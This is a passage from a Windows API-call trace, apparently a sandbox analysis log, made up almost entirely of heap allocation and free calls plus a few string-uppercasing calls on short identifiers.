Size=0x10) returned 0x2aab218 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.950] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0215.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.953] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.954] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.955] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0215.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.955] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.957] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba10 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ed8 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.958] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | 